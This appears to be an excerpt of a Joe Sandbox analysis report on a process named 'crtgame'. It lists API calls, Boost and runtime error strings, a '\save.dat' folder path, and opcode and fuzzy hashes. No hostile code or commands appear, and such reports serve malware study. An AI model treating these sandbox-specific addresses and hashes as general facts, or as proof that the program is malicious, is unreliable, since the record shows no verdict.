                                                                              APIs
                                                                              • __EH_prolog.LIBCMT ref: 02C2C63D
                                                                                • Part of subcall function 02C2CC19: std::exception::exception.LIBCMT ref: 02C2CC48
                                                                                • Part of subcall function 02C2D3D2: __EH_prolog.LIBCMT ref: 02C2D3D7
                                                                                • Part of subcall function 02C3354C: _malloc.LIBCMT ref: 02C33564
                                                                                • Part of subcall function 02C2CC78: __EH_prolog.LIBCMT ref: 02C2CC7D
                                                                              Strings
                                                                              • C:\boost_1_55_0\staging\include\boost-1_55\boost/exception/detail/exception_ptr.hpp, xrefs: 02C2C67A
                                                                              • class boost::exception_ptr __cdecl boost::exception_detail::get_static_exception_object<struct boost::exception_detail::bad_alloc_>(void), xrefs: 02C2C673
                                                                              Memory Dump Source
                                                                              • Source File: 00000006.00000002.2939863204.0000000002C21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C21000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_6_2_2c21000_crtgame.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: H_prolog$_mallocstd::exception::exception
                                                                              • String ID: C:\boost_1_55_0\staging\include\boost-1_55\boost/exception/detail/exception_ptr.hpp$class boost::exception_ptr __cdecl boost::exception_detail::get_static_exception_object<struct boost::exception_detail::bad_alloc_>(void)
                                                                              • API String ID: 1953324306-1943798000
                                                                              • Opcode ID: 9aa9b2d8fb7d3d592913aa1f7fbf1036d9da7ae5dffceee9b9c3bb44c528c05c
                                                                              • Instruction ID: bbfade04acca29e4d2e0dfea8b3ce2859c3c84cfc8d19d8de9a54ffecc81521b
                                                                              • Opcode Fuzzy Hash: 9aa9b2d8fb7d3d592913aa1f7fbf1036d9da7ae5dffceee9b9c3bb44c528c05c
                                                                              • Instruction Fuzzy Hash: F82191B1E002689BDB08EFE8D954BAEBBB5EF54704F00055EE806BB240DF749A48DF50
                                                                              APIs
                                                                              • __EH_prolog.LIBCMT ref: 02C2C732
                                                                                • Part of subcall function 02C2CCF0: std::exception::exception.LIBCMT ref: 02C2CD1D
                                                                                • Part of subcall function 02C2D509: __EH_prolog.LIBCMT ref: 02C2D50E
                                                                                • Part of subcall function 02C3354C: _malloc.LIBCMT ref: 02C33564
                                                                                • Part of subcall function 02C2CD4D: __EH_prolog.LIBCMT ref: 02C2CD52
                                                                              Strings
                                                                              • class boost::exception_ptr __cdecl boost::exception_detail::get_static_exception_object<struct boost::exception_detail::bad_exception_>(void), xrefs: 02C2C768
                                                                              • C:\boost_1_55_0\staging\include\boost-1_55\boost/exception/detail/exception_ptr.hpp, xrefs: 02C2C76F
                                                                              Memory Dump Source
                                                                              • Source File: 00000006.00000002.2939863204.0000000002C21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C21000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_6_2_2c21000_crtgame.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: H_prolog$_mallocstd::exception::exception
                                                                              • String ID: C:\boost_1_55_0\staging\include\boost-1_55\boost/exception/detail/exception_ptr.hpp$class boost::exception_ptr __cdecl boost::exception_detail::get_static_exception_object<struct boost::exception_detail::bad_exception_>(void)
                                                                              • API String ID: 1953324306-412195191
                                                                              • Opcode ID: 11b9ac1bba84525417b71deab8cc21985a9ace874d9255cbe0134a19746d5730
                                                                              • Instruction ID: fd51077d90fe55998c155796d81b0b8e726118ed54449f3250894db5918fec4a
                                                                              • Opcode Fuzzy Hash: 11b9ac1bba84525417b71deab8cc21985a9ace874d9255cbe0134a19746d5730
                                                                              • Instruction Fuzzy Hash: 4E21BFB1E002689BDB18EFE8D544BEEBBB5EF54704F00055EE806AB240DF749A48DF90
                                                                              APIs
                                                                              • _malloc.LIBCMT ref: 02C25288
                                                                                • Part of subcall function 02C329AC: __FF_MSGBANNER.LIBCMT ref: 02C329C3
                                                                                • Part of subcall function 02C329AC: __NMSG_WRITE.LIBCMT ref: 02C329CA
                                                                                • Part of subcall function 02C329AC: RtlAllocateHeap.NTDLL(00800000,00000000,00000001), ref: 02C329EF
                                                                              • SHGetSpecialFolderPathA.SHELL32(00000000,00000000,00000023,00000000,00002000,00000000,00000001,00000000,00000000,?,02C275B2), ref: 02C2529A
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000006.00000002.2939863204.0000000002C21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C21000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_6_2_2c21000_crtgame.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: AllocateFolderHeapPathSpecial_malloc
                                                                              • String ID: \save.dat
                                                                              • API String ID: 4128168839-3580179773
                                                                              • Opcode ID: ba15e872e7b87b447a493eb3cb403ef67b3f4e03a1ece4b588ab8bd03916e2a3
                                                                              • Instruction ID: 2fe676f6c71f5e235a4936563705885eb2f1f191f8643ab9cec906c93a981d2d
                                                                              • Opcode Fuzzy Hash: ba15e872e7b87b447a493eb3cb403ef67b3f4e03a1ece4b588ab8bd03916e2a3
                                                                              • Instruction Fuzzy Hash: 2E1194329043512BDB269E648C80E6FFF67DFC169071406ECEC4567102DE731D06C5E0
                                                                              APIs
                                                                              • __EH_prolog.LIBCMT ref: 02C2396A
                                                                              • std::runtime_error::runtime_error.LIBCPMT ref: 02C239C1
                                                                                • Part of subcall function 02C21410: std::exception::exception.LIBCMT ref: 02C21428
                                                                                • Part of subcall function 02C29FA7: __EH_prolog.LIBCMT ref: 02C29FAC
                                                                                • Part of subcall function 02C29FA7: Concurrency::cancellation_token::_FromImpl.LIBCPMT ref: 02C29FBB
                                                                                • Part of subcall function 02C29FA7: __CxxThrowException@8.LIBCMT ref: 02C29FDA
                                                                              Strings
                                                                              • Day of month is not valid for year, xrefs: 02C239AC
                                                                              Memory Dump Source
                                                                              • Source File: 00000006.00000002.2939863204.0000000002C21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C21000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_6_2_2c21000_crtgame.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: H_prolog$Concurrency::cancellation_token::_Exception@8FromImplThrowstd::exception::exceptionstd::runtime_error::runtime_error
                                                                              • String ID: Day of month is not valid for year
                                                                              • API String ID: 1404951899-1521898139
                                                                              • Opcode ID: f4faaea5081b150041d41a75d65a57285fd23f70875a7ac7c369ee7999bbfc80
                                                                              • Instruction ID: ac08278c3adaf43db99c59d93442eb3826c473c71810b0c02785344545c96b61
                                                                              • Opcode Fuzzy Hash: f4faaea5081b150041d41a75d65a57285fd23f70875a7ac7c369ee7999bbfc80
                                                                              • Instruction Fuzzy Hash: 5101B17A910259AADF04EFA8D841AEFB779FF18710F10401AEC04A3200EF704A49DB95
                                                                              APIs
                                                                              • std::exception::exception.LIBCMT ref: 02C2F510
                                                                              • __CxxThrowException@8.LIBCMT ref: 02C2F525
                                                                                • Part of subcall function 02C3354C: _malloc.LIBCMT ref: 02C33564
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000006.00000002.2939863204.0000000002C21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C21000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_6_2_2c21000_crtgame.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Exception@8Throw_mallocstd::exception::exception
                                                                              • String ID: bad allocation
                                                                              • API String ID: 4063778783-2104205924
                                                                              • Opcode ID: 1e8d4cbd3536c9c3af2fd88eb5ccbc750393a2f49b36f589ac91352955ff844b
                                                                              • Instruction ID: 942564b7743e1005540b665ebfa1b74ddb49222d420eddd3f91ac2d2e0e3d5fe
                                                                              • Opcode Fuzzy Hash: 1e8d4cbd3536c9c3af2fd88eb5ccbc750393a2f49b36f589ac91352955ff844b
                                                                              • Instruction Fuzzy Hash: D2F02EB064031DA7EF04E6A889149BF73FC9F04300B400AA5E415D3180EF71E7088994
                                                                              APIs
                                                                              • __EH_prolog.LIBCMT ref: 02C23C1B
                                                                              • std::bad_exception::bad_exception.LIBCMT ref: 02C23C30
                                                                                • Part of subcall function 02C31EB7: std::exception::exception.LIBCMT ref: 02C31EC1
                                                                                • Part of subcall function 02C29FE0: __EH_prolog.LIBCMT ref: 02C29FE5
                                                                                • Part of subcall function 02C29FE0: __CxxThrowException@8.LIBCMT ref: 02C2A00E
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000006.00000002.2939863204.0000000002C21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C21000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_6_2_2c21000_crtgame.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: H_prolog$Exception@8Throwstd::bad_exception::bad_exceptionstd::exception::exception
                                                                              • String ID: bad cast
                                                                              • API String ID: 1300498068-3145022300
                                                                              • Opcode ID: 180a879f869caa01f9ae61d1dd7fb145a98d95c41efefea4369c4360fb68c0a9
                                                                              • Instruction ID: efbbe6a3b51a7a43620c062f3c1da0f71a35edaf34cf6cf46f791b05db5c51af
                                                                              • Opcode Fuzzy Hash: 180a879f869caa01f9ae61d1dd7fb145a98d95c41efefea4369c4360fb68c0a9
                                                                              • Instruction Fuzzy Hash: 43F0A072A005048BC719EF58D440AEBB776EF62315F1041AEED065B340CFB29A4BDAD1
                                                                              APIs
                                                                              • __EH_prolog.LIBCMT ref: 02C238D2
                                                                              • std::runtime_error::runtime_error.LIBCPMT ref: 02C238F1
                                                                                • Part of subcall function 02C21410: std::exception::exception.LIBCMT ref: 02C21428
                                                                              Strings
                                                                              • Year is out of valid range: 1400..10000, xrefs: 02C238E0
                                                                              Memory Dump Source
                                                                              • Source File: 00000006.00000002.2939863204.0000000002C21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C21000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_6_2_2c21000_crtgame.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: H_prologstd::exception::exceptionstd::runtime_error::runtime_error
                                                                              • String ID: Year is out of valid range: 1400..10000
                                                                              • API String ID: 2067857976-2344417016
                                                                              • Opcode ID: 2a6bf31e4f21512898ee70786c72a30016efcebb71b05979b2ac3d20265f8ef4
                                                                              • Instruction ID: 7242bd8f0e85f8ab4e22ced8d18f5d37751407ab98a54cba44134e73691219bf
                                                                              • Opcode Fuzzy Hash: 2a6bf31e4f21512898ee70786c72a30016efcebb71b05979b2ac3d20265f8ef4
                                                                              • Instruction Fuzzy Hash: 07E0D8B2A4011457DB28FB98CC117EEB7B9DB08750F00015AE80563280DFB12948DB90
                                                                              APIs
                                                                              • __EH_prolog.LIBCMT ref: 02C23886
                                                                              • std::runtime_error::runtime_error.LIBCPMT ref: 02C238A5
                                                                                • Part of subcall function 02C21410: std::exception::exception.LIBCMT ref: 02C21428
                                                                              Strings
                                                                              • Day of month value is out of range 1..31, xrefs: 02C23894
                                                                              Memory Dump Source
                                                                              • Source File: 00000006.00000002.2939863204.0000000002C21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C21000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_6_2_2c21000_crtgame.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: H_prologstd::exception::exceptionstd::runtime_error::runtime_error
                                                                              • String ID: Day of month value is out of range 1..31
                                                                              • API String ID: 2067857976-1361117730
                                                                              • Opcode ID: ef96fbd73e648332c867eb20f335eadca2a5d4e7cfe1eb30ac2ce4bc8e5fd4c8
                                                                              • Instruction ID: cf625cad5deb1777640526be1ab3ea720568e6281cd40503a6394c67c51e8ad4
                                                                              • Opcode Fuzzy Hash: ef96fbd73e648332c867eb20f335eadca2a5d4e7cfe1eb30ac2ce4bc8e5fd4c8
                                                                              • Instruction Fuzzy Hash: C8E0D8B2A4011497EB24FB98CC517EEB7B9DB08720F00055AE80573280DFB12948DB90
                                                                              APIs
                                                                              • __EH_prolog.LIBCMT ref: 02C2391E
                                                                              • std::runtime_error::runtime_error.LIBCPMT ref: 02C2393D
                                                                                • Part of subcall function 02C21410: std::exception::exception.LIBCMT ref: 02C21428
                                                                              Strings
                                                                              • Month number is out of range 1..12, xrefs: 02C2392C
                                                                              Memory Dump Source
                                                                              • Source File: 00000006.00000002.2939863204.0000000002C21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C21000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_6_2_2c21000_crtgame.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: H_prologstd::exception::exceptionstd::runtime_error::runtime_error
                                                                              • String ID: Month number is out of range 1..12
                                                                              • API String ID: 2067857976-4198407886
                                                                              • Opcode ID: 12fec39efcd8291e10ac827f2898cde58a07416ae53974af378d7f4702380f3d
                                                                              • Instruction ID: 6def07d69d82ea1b33d58cebe107499316a99e8ed99999682cd46f5ca4cc3205
                                                                              • Opcode Fuzzy Hash: 12fec39efcd8291e10ac827f2898cde58a07416ae53974af378d7f4702380f3d
                                                                              • Instruction Fuzzy Hash: 44E0D8B2B4022457D724FB98CC117EEB779DB08750F00015AE40563680DFB12948DBD1
                                                                              APIs
                                                                              • TlsAlloc.KERNEL32 ref: 02C219CC
                                                                              • GetLastError.KERNEL32 ref: 02C219D9
                                                                                • Part of subcall function 02C21712: __EH_prolog.LIBCMT ref: 02C21717
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000006.00000002.2939863204.0000000002C21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C21000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_6_2_2c21000_crtgame.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: AllocErrorH_prologLast
                                                                              • String ID: tss
                                                                              • API String ID: 249634027-1638339373
                                                                              • Opcode ID: d74c2c4a06143dbf214ce1846d25a4d3140567e1ded45b49183cffa458d6e825
                                                                              • Instruction ID: 55b531c7420cf71d8db5993b97f51270f68f005a5a5ff9bb0b21de1d19aeb087
                                                                              • Opcode Fuzzy Hash: d74c2c4a06143dbf214ce1846d25a4d3140567e1ded45b49183cffa458d6e825
                                                                              • Instruction Fuzzy Hash: 86E08676D052245BC3107B78980808BBBD49A84230F104B66ECAD832D1FF7199589FC6
                                                                              APIs
                                                                              • __EH_prolog.LIBCMT ref: 02C23BD8
                                                                              • std::bad_exception::bad_exception.LIBCMT ref: 02C23BED
                                                                                • Part of subcall function 02C31EB7: std::exception::exception.LIBCMT ref: 02C31EC1
                                                                                • Part of subcall function 02C29FE0: __EH_prolog.LIBCMT ref: 02C29FE5
                                                                                • Part of subcall function 02C29FE0: __CxxThrowException@8.LIBCMT ref: 02C2A00E
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000006.00000002.2939863204.0000000002C21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C21000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_6_2_2c21000_crtgame.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: H_prolog$Exception@8Throwstd::bad_exception::bad_exceptionstd::exception::exception
                                                                              • String ID: bad cast
                                                                              • API String ID: 1300498068-3145022300
                                                                              • Opcode ID: 38567bb5c1c9ff92609438c0d2d4a3a0e13204bdf698fc136a951b373fddf6d2
                                                                              • Instruction ID: 65338436fa0ba3e001f3aab3ece1deef6a7739c2ac5778742409ee05313a55d0
                                                                              • Opcode Fuzzy Hash: 38567bb5c1c9ff92609438c0d2d4a3a0e13204bdf698fc136a951b373fddf6d2
                                                                              • Instruction Fuzzy Hash: 33E0D6B0A00108DBC729EF54D501BEEBBB2EF20304F1080ACAC0A07780CF761A0ADE82